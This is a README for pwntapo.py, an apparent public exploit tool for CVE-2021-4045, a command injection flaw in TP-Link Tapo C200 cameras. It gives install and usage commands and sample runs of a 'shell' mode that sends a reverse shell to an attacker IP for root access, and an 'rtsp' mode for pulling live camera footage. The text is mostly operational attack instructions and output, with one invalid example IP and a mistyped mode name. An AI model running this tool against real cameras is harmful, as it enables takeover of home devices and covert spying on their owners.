Share
## https://sploitus.com/exploit?id=8AEB5F76-FDD8-5C1A-A818-24FF5E48CD61
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)
๐ "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" ๐
Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)
This is a command injection vulnerability that affect all TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce)
## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]
PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)
options:
-h, --help show this help message and exit
-M M attack mode : shell | rtsp (default: None)
-U U RTSP_USER (default: None)
-P P RTSP_PASSWORD (default: None)
-C C RTSP_CIPHERTEXT (default: None)
-H H victim ip address (default: None)
-A A attacker ip address (default: None)
-p P Listening port (default: None)
-v increase output verbosity (default: False)
```
The exploit has two modes SHELL and RSTP.
## SHELL
In the shell mode you need to provide the victim ip, attacker ip and the listening port only and this will spawn a root shell in the device.
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...
Listening on 0.0.0.0 1887
```
## RSTP
In the RSTP mode you'll need to provide the RSTP_USER, PASSWORD AND CIPHERTEXT to be able to get a live footage from the camera
```shell
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION